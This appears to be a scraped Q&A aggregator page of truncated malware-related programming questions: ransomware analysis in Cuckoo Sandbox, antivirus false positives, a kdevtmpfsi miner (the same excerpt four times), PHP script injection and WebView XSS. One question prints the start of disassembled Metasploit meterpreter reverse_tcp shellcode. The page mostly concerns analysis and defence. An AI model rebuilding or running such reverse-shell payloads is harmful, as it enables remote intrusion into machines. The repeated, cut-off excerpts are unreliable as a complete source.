malware

How do I extract specific files from Cuckoo Sandbox VM?

女生的网名这么多〃 提交于 2021-02-11 14:13:56
问题 I study about ransomware behavior with cuckoo sandbox. I need to get encrypted files and threatening letter which those made by ransomware, but they exist on my Cuckoo Sandbox VM. How do I extract specific files from its VM? my environment: cuckoo sandbox 2.06 Host OS:Ubuntu 18.04 Guest OS:Windows7SP1x86(without guest additions) VM soft: Virtual Box 5.2 回答1: You can get the requiere time to handle your manipulatiuons by: 1- specify a hight number of second either using command line (ex -

Virustotal flag 32 bit version of my program as malware

允我心安 提交于 2021-02-08 10:09:41
问题 I've run into a very odd thing. I wrote a pretty simple program in C#, and tried to build a 32bit and a 64bit version of it. The 64bit version works fine, but whenever i try to build the 32bit version, my antivirus software removes it. I've uploaded both files to virustotal here: 32 bit: https://virustotal.com/da/file/fdb3d2870ce876b49eb5d9371fc0b133b7657ddd994603777a42a47f3eb09d8b/analysis/1461779525/ 64 bit: https://virustotal.com/da/file

Why is this assembly program crashing (re-assembled ndisasm output)?

社会主义新天地 提交于 2021-01-29 12:39:57
问题 I extracted the assembly code of the windows/meterpreter/reverse_tcp payload with lhost set to 127.0.0.1 and lport set to 443 , however after building the assembly program with fasm the program crashes, any ideas as to why? assembly code: format PE console use32 entry start start: pusha mov ebp,esp xor edx,edx mov edx,[fs:edx+0x30] mov edx,[edx+0xc] mov edx,[edx+0x14] xor edi,edi movzx ecx,word [edx+0x26] mov esi,[edx+0x28] xor eax,eax lodsb cmp al,0x61 jl 0x27 sub al,0x20 ror edi, 0xd add

kdevtmpfsi using the entire CPU

淺唱寂寞╮ 提交于 2020-12-03 07:42:38
问题 We are using an EC2(Ubuntu) amazon instance for running Apache.Recently we noticed that there is a process using the entire CPU. We removed it using the help of the following procedure [root@hadoop002 tmp]# systemctl status 25177 ● session-5772.scope - Session 5772 of user root Loaded: loaded (/run/systemd/system/session-5772.scope; static; vendor preset: disabled) Drop-In: /run/systemd/system/session-5772.scope.d └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions

kdevtmpfsi using the entire CPU

随声附和 提交于 2020-12-03 07:39:56
问题 We are using an EC2(Ubuntu) amazon instance for running Apache.Recently we noticed that there is a process using the entire CPU. We removed it using the help of the following procedure [root@hadoop002 tmp]# systemctl status 25177 ● session-5772.scope - Session 5772 of user root Loaded: loaded (/run/systemd/system/session-5772.scope; static; vendor preset: disabled) Drop-In: /run/systemd/system/session-5772.scope.d └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions

kdevtmpfsi using the entire CPU

会有一股神秘感。 提交于 2020-12-03 07:39:49
问题 We are using an EC2(Ubuntu) amazon instance for running Apache.Recently we noticed that there is a process using the entire CPU. We removed it using the help of the following procedure [root@hadoop002 tmp]# systemctl status 25177 ● session-5772.scope - Session 5772 of user root Loaded: loaded (/run/systemd/system/session-5772.scope; static; vendor preset: disabled) Drop-In: /run/systemd/system/session-5772.scope.d └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions

kdevtmpfsi using the entire CPU

梦想的初衷 提交于 2020-12-03 07:39:30
问题 We are using an EC2(Ubuntu) amazon instance for running Apache.Recently we noticed that there is a process using the entire CPU. We removed it using the help of the following procedure [root@hadoop002 tmp]# systemctl status 25177 ● session-5772.scope - Session 5772 of user root Loaded: loaded (/run/systemd/system/session-5772.scope; static; vendor preset: disabled) Drop-In: /run/systemd/system/session-5772.scope.d └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions

C programs getting detected as Malware

白昼怎懂夜的黑 提交于 2020-07-03 05:21:06
问题 Recently my C programs started to act weirdly and I had no idea why... Then I realized that they were being flagged by my antivirus program as malware... First I thought there's a malware in my compiler (I'm using CodeBlocks IDE with MinGW-GCC as c compiler), Antivirus scan returned nothing. So I started experimenting on it... I wrote a simple hello world using c #include <stdio.h> int main() { printf("Hello"); return 0; } Soon as I compiled it windows defender flagged it as Trojan:Win32

About Removing Malware Scripts

拟墨画扇 提交于 2019-12-31 03:57:19
问题 I am working on a php website and it gets regularly infected by Malware. I've gone through all the security steps but failed. But I know how it every time infect my code. It comes at the starting of my php index file as following. <script>.....</script><? Can anybody please help me how can I remove the starting block code of every index file at my server folders? I will use a cron for this. I already gone through regex question for removal of javascript malware but did not found what I want.

Android App using Webview/javascript. what can be security concern?

自闭症网瘾萝莉.ら 提交于 2019-12-28 05:38:25
问题 I am creating an android web app using Webview and Javascript making addJavascriptInterface(true) . My App will content data(html) that will be loaded from an external site. I worried about the cross-site-scripting XSS/security of my app as I am enabling addJavascriptInterface(true). What are the things I should be taking care so that any malicious code should not run on my app ? 回答1: I found a good study from Syracuse University called Attacks on WebView in the Android System, which